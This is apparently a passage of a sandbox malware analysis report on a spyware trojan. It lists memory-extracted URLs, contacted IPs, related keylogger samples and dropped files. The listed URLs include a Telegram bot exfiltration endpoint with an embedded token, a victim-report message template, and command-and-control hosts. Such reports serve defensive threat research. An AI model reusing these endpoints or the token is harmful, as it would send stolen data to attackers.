https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20and%20Time:%2024/12/2024%20/%2015:16:08%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20927537%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	msiexec.exe, 00000009.00000002.2547152086.00000000219B1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2547152086.0000000021CA0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	msiexec.exe, 00000009.00000002.2547152086.00000000219B1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2547152086.0000000021CA0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org	msiexec.exe, 00000009.00000002.2545503931.0000000020B91000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2545503931.0000000020A7B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2545503931.0000000020B7D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	msiexec.exe, 00000009.00000002.2545503931.0000000020B7D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.microsoft	powershell.exe, 00000005.00000002.1528725368.0000000008043000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000005.00000002.1521930295.00000000058BD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.office.com/lB	msiexec.exe, 00000009.00000002.2545503931.0000000020B4E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	msiexec.exe, 00000009.00000002.2547152086.00000000219B1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2547152086.0000000021CA0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=en	msiexec.exe, 00000009.00000002.2545503931.0000000020B21000.00000004.00000800.00020000.00000000.sdmp	false		high
http://varders.kozow.com:8081	msiexec.exe, 00000009.00000002.2545503931.0000000020991000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com	msiexec.exe, 00000009.00000003.1568695480.0000000000B53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.1568749006.0000000000B53000.00000004.00000020.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lB	powershell.exe, 00000005.00000002.1519110053.0000000004851000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.google.com/	msiexec.exe, 00000009.00000002.2530233979.0000000000ADA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	msiexec.exe, 00000009.00000002.2547152086.00000000219B1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2547152086.0000000021CA0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000005.00000002.1521930295.00000000058BD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000005.00000002.1521930295.00000000058BD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=enlB	msiexec.exe, 00000009.00000002.2545503931.0000000020B1C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://apis.google.com	msiexec.exe, 00000009.00000003.1568695480.0000000000B53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.1568749006.0000000000B53000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000005.00000002.1519110053.0000000004851000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2545503931.0000000020991000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/	msiexec.exe, 00000009.00000002.2545503931.00000000209E0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.office.com/	msiexec.exe, 00000009.00000002.2545503931.0000000020B53000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2545503931.0000000020B44000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000005.00000002.1521930295.00000000058BD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000005.00000002.1519110053.00000000049A6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	msiexec.exe, 00000009.00000002.2547152086.00000000219B1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2547152086.0000000021CA0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000005.00000002.1519110053.00000000049A6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://translate.google.com/translate_a/element.js	msiexec.exe, 00000009.00000003.1568695480.0000000000B53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2530233979.0000000000B93000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.1627272571.0000000000B93000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.1568749006.0000000000B53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2328151794.0000000000B93000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000005.00000002.1519110053.00000000049A6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000005.00000002.1519110053.00000000049A6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE/sendDocument?chat_id=7695	msiexec.exe, 00000009.00000002.2545503931.0000000020B7D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000005.00000002.1521930295.00000000058BD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	msiexec.exe, 00000009.00000002.2547152086.00000000219B1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2547152086.0000000021CA0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/	msiexec.exe, 00000009.00000003.1627272571.0000000000B53000.00000004.00000020.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	msiexec.exe, 00000009.00000002.2545503931.0000000020991000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	Azygoses125.exe, Azygoses125.exe.5.dr	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	msiexec.exe, 00000009.00000002.2545503931.0000000020A7B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	msiexec.exe, 00000009.00000002.2547152086.00000000219B1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2547152086.0000000021CA0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.microsoft.	msiexec.exe, 00000009.00000003.1568695480.0000000000B53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.1627272571.0000000000B53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.1568749006.0000000000B53000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000005.00000002.1519110053.00000000049A6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://aborters.duckdns.org:8081	msiexec.exe, 00000009.00000002.2545503931.0000000020991000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	msiexec.exe, 00000009.00000002.2547152086.00000000219B1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2547152086.0000000021CA0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://51.38.247.67:8081/_send_.php?L	msiexec.exe, 00000009.00000002.2545503931.0000000020B7D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ion=v4.5	powershell.exe, 00000005.00000002.1518306553.00000000029AB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://anotherarmy.dns.army:8081	msiexec.exe, 00000009.00000002.2545503931.0000000020991000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000005.00000002.1519110053.00000000049A6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.123.189$	msiexec.exe, 00000009.00000002.2545503931.0000000020A51000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2545503931.0000000020A0B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	msiexec.exe, 00000009.00000002.2545503931.0000000020A51000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2545503931.00000000209E0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20a	msiexec.exe, 00000009.00000002.2545503931.0000000020A7B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.google.com/(	msiexec.exe, 00000009.00000002.2530233979.0000000000ADA000.00000004.00000020.00020000.00000000.sdmp	false		high
http://api.telegram.org	msiexec.exe, 00000009.00000002.2545503931.0000000020B91000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2545503931.0000000020B7D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	msiexec.exe, 00000009.00000002.2547152086.00000000219B1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2547152086.0000000021CA0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.micros	msiexec.exe, 00000009.00000002.2530233979.0000000000B4C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.1568695480.0000000000B53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2328151794.0000000000B6D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.1627272571.0000000000B53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.1568749006.0000000000B53000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
132.226.8.169	checkip.dyndns.com	United States	16989	UTMEMUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
142.250.181.1	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
104.21.67.152	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
172.217.19.174	drive.google.com	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1580088
Start date and time:	2024-12-23 21:49:12 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Azygoses125.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/16@6/5
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 96% Number of executed functions: 148 Number of non-executed functions: 49
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.175.87.197
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target msiexec.exe, PID 5500 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7824 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Azygoses125.exe

Simulations

Behavior and APIs

Time	Type	Description
15:50:14	API Interceptor	39x Sleep call for process: powershell.exe modified
17:05:57	API Interceptor	256737x Sleep call for process: msiexec.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
132.226.8.169	PARATRANSFARI REMINDER.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	F.O Pump Istek,Docx.bat	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse	checkip.dyndns.org/
	0001.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	PK241200518-EMAIL RELEASE-pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Get hash	malicious	VIP Keylogger	Browse	checkip.dyndns.org/
	CITAS_pif.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	conferma..exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	file.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	PARATRANSFARI REMINDER.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	MT Eagle Asia 11.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	Order_12232024.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	rTTSWIFTCOPIES.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	Ziraat_Bankasi_Swift_Mesaji_TXB04958T.scr.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	Statement_3029_from_Cross_Traders_and_Logistics_ltd.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	Invoice DHL - AWB 2024 E4001 - 0000731.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	YU SV Payment.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	PURCHASE ORDER TRC-090971819130-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.67.152
	PAYMENT ADVICE 750013-1012449943-81347-pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	172.67.177.134
api.telegram.org	tg.exe	Get hash	malicious	Babadeda	Browse	149.154.167.220
	tg.exe	Get hash	malicious	Babadeda	Browse	149.154.167.220
	setup.exe	Get hash	malicious	Babadeda	Browse	149.154.167.220
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	149.154.167.220
	user.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Xmrig	Browse	149.154.167.220
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Xmrig	Browse	149.154.167.220
	8v1GZ8v1LF.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	HX Design.exe	Get hash	malicious	Python Stealer, Blank Grabber	Browse	149.154.167.220
	2QaN4hOyJs.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
checkip.dyndns.com	PARATRANSFARI REMINDER.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	MT Eagle Asia 11.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	Order_12232024.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	rTTSWIFTCOPIES.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	Ziraat_Bankasi_Swift_Mesaji_TXB04958T.scr.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	Statement_3029_from_Cross_Traders_and_Logistics_ltd.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	Invoice DHL - AWB 2024 E4001 - 0000731.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	Requested Documentation.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	YU SV Payment.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	PURCHASE ORDER TRC-090971819130-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	ChoForgot.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	YYjRtxS70h.exe	Get hash	malicious	Unknown	Browse	149.154.167.99
	YYjRtxS70h.exe	Get hash	malicious	Unknown	Browse	149.154.167.99
	gVKsiQIHqe.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	trZG6pItZj.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	9EI7wrGs4K.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	tg.exe	Get hash	malicious	Babadeda	Browse	149.154.167.220
	tg.exe	Get hash	malicious	Babadeda	Browse	149.154.167.220
	setup.exe	Get hash	malicious	Babadeda	Browse	149.154.167.220
	AmsterdamCryptoLTD.exe	Get hash	malicious	LummaC, DarkComet, LummaC Stealer, Vidar	Browse	149.154.167.99
CLOUDFLARENETUS	HUBED342024.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	PARATRANSFARI REMINDER.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	https://www.canva.com/design/DAGaHpv1g1M/bVE7B2sT8b8T3P-e2xb64w/view?utm_content=DAGaHpv1g1M&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=h1ee3678e45	Get hash	malicious	HTMLPhisher	Browse	172.67.74.152
	Violated Heroine_91zbZ-1.exe	Get hash	malicious	Unknown	Browse	104.18.20.226
	Play Aud.html	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://flowto.it/8tooc2sec?fc=0	Get hash	malicious	Unknown	Browse	104.18.35.227
	Violated Heroine_91zbZ-1.exe	Get hash	malicious	Unknown	Browse	104.20.87.8
	vFile__0054seconds__Airborn.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://jkqbjwq.maxiite.com	Get hash	malicious	Unknown	Browse	104.16.123.96
	[External] 120112 Manual Policies Overview Guide_ 8VM8-WZPT3L-LYH1.eml	Get hash	malicious	Unknown	Browse	1.1.1.1
UTMEMUS	PARATRANSFARI REMINDER.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	Invoice DHL - AWB 2024 E4001 - 0000731.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	PURCHASE ORDER TRC-090971819130-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	F.O Pump Istek,Docx.bat	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse	132.226.8.169
	D.G Governor Istek,Docx.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse	132.226.247.73
	0001.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	sparc.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	132.240.253.211
	x86_32.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	132.244.23.61
	PK241200518-EMAIL RELEASE-pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	HUBED342024.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	PARATRANSFARI REMINDER.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	MT Eagle Asia 11.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	Order_12232024.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	rTTSWIFTCOPIES.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	Ziraat_Bankasi_Swift_Mesaji_TXB04958T.scr.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	Statement_3029_from_Cross_Traders_and_Logistics_ltd.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	Browser.Daemon.exe	Get hash	malicious	Unknown	Browse	104.21.67.152
	Browser.Daemon.exe	Get hash	malicious	Unknown	Browse	104.21.67.152
	Invoice DHL - AWB 2024 E4001 - 0000731.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
3b5074b1b5d032e5620f69f9f700ff0e	WO.exe	Get hash	malicious	Metasploit	Browse	149.154.167.220
	ChoForgot.exe	Get hash	malicious	Vidar	Browse	149.154.167.220
	payment_3493.pdf	Get hash	malicious	Unknown	Browse	149.154.167.220
	1lhZVZx5nD.exe	Get hash	malicious	Stealc, Vidar	Browse	149.154.167.220
	Archivo-PxFkiLTWYG-23122024095010.hta	Get hash	malicious	Unknown	Browse	149.154.167.220
	acronis recovery expert deluxe 1.0.0.132.rarl.exe	Get hash	malicious	LummaC	Browse	149.154.167.220
	Archivo-PxFkiLTWYG-23122024095010.hta	Get hash	malicious	Unknown	Browse	149.154.167.220
	Ref#20203216.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	YYjRtxS70h.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	YYjRtxS70h.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
37f463bf4616ecd445d4a1937da06e19	Violated Heroine_91zbZ-1.exe	Get hash	malicious	Unknown	Browse	142.250.181.1 172.217.19.174
	3gPZmVbozD.msi	Get hash	malicious	Unknown	Browse	142.250.181.1 172.217.19.174
	fkawMJ7FH8.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine, Stealc	Browse	142.250.181.1 172.217.19.174
	ChoForgot.exe	Get hash	malicious	Vidar	Browse	142.250.181.1 172.217.19.174
	Archivo-PxFkiLTWYG-23122024095010.hta	Get hash	malicious	Unknown	Browse	142.250.181.1 172.217.19.174
	Archivo-PxFkiLTWYG-23122024095010.hta	Get hash	malicious	Unknown	Browse	142.250.181.1 172.217.19.174
	YYjRtxS70h.exe	Get hash	malicious	Unknown	Browse	142.250.181.1 172.217.19.174
	YYjRtxS70h.exe	Get hash	malicious	Unknown	Browse	142.250.181.1 172.217.19.174
	nTyPEbq9wQ.lnk	Get hash	malicious	Unknown	Browse	142.250.181.1 172.217.19.174
	7A2lfjTYNf.lnk	Get hash	malicious	Unknown	Browse	142.250.181.1 172.217.19.174

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsq93A2.tmp\nsExec.dll	WYnv59N83j.exe	Get hash	malicious	FormBook, GuLoader	Browse
	t6V3uvyaAP.exe	Get hash	malicious	GuLoader	Browse
	WYnv59N83j.exe	Get hash	malicious	GuLoader	Browse
	t6V3uvyaAP.exe	Get hash	malicious	GuLoader	Browse
	Unspuriousness.exe	Get hash	malicious	FormBook, GuLoader	Browse
	Unspuriousness.exe	Get hash	malicious	GuLoader	Browse
	Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Get hash	malicious	GuLoader	Browse
	SecuriteInfo.com.W32.AIDetect.malware2.20337.14221.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	SecuriteInfo.com.W32.AIDetect.malware2.20337.14221.exe	Get hash	malicious	GuLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	53158
Entropy (8bit):	5.062687652912555
Encrypted:	false
SSDEEP:	1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
MD5:	5D430F1344CE89737902AEC47C61C930
SHA1:	0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
SHA-256:	395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
SHA-512:	DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2gquzvnn.ato.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2jd0fbiz.2s1.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4jlqzkqo.0hp.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

